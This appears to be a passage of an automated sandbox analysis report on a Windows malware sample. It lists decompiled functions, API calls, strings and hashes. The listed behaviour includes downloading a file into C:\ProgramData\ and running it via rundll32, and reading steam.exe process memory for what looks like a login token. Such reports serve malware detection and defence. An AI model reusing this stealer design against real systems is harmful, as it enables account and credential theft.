                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404100: InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00412374
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internetlstrcpy$CloseFileHandle$Openlstrcatlstrlen$CreateExecuteReadShellSystemTimeWritememset
                                                                                                                                                                                                                                                                                                  • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 1030512983-3594953769
                                                                                                                                                                                                                                                                                                  • Opcode ID: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94f81c9545e4cc3746d51ce8cbcf5f5300d4dbcdb4f20de0f2bf9a4aeae790fb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87815170A0021857DB14FBB2CDEAAEF7B69AF44748F40145EB4066B182DEBC5DC5C7A8
                                                                                                                                                                                                                                                                                                  Function 0041D590 Relevance: 9.1, APIs: 6, Instructions: 118timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                                  • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                                                  Function 00410920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38memorytimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d/%d/%d %d:%d:%d
                                                                                                                                                                                                                                                                                                  • API String ID: 1243822799-1073349071
                                                                                                                                                                                                                                                                                                  • Opcode ID: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                                  • Instruction ID: a51e7d71a8269122c591f01167c988a4a4a74b4f43d1a07cc1a506d8f3a3d197
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF0E9619042207BE300175ADC49D3BB7ECEFC5B66F00450AF9C8861C0E2755C60C3F1
                                                                                                                                                                                                                                                                                                  Function 0040F780 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                                                  • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                                                  Function 00412C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_s
                                                                                                                                                                                                                                                                                                  • String ID: |
                                                                                                                                                                                                                                                                                                  • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                                                  • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                                                  Function 00410050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ED0: StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
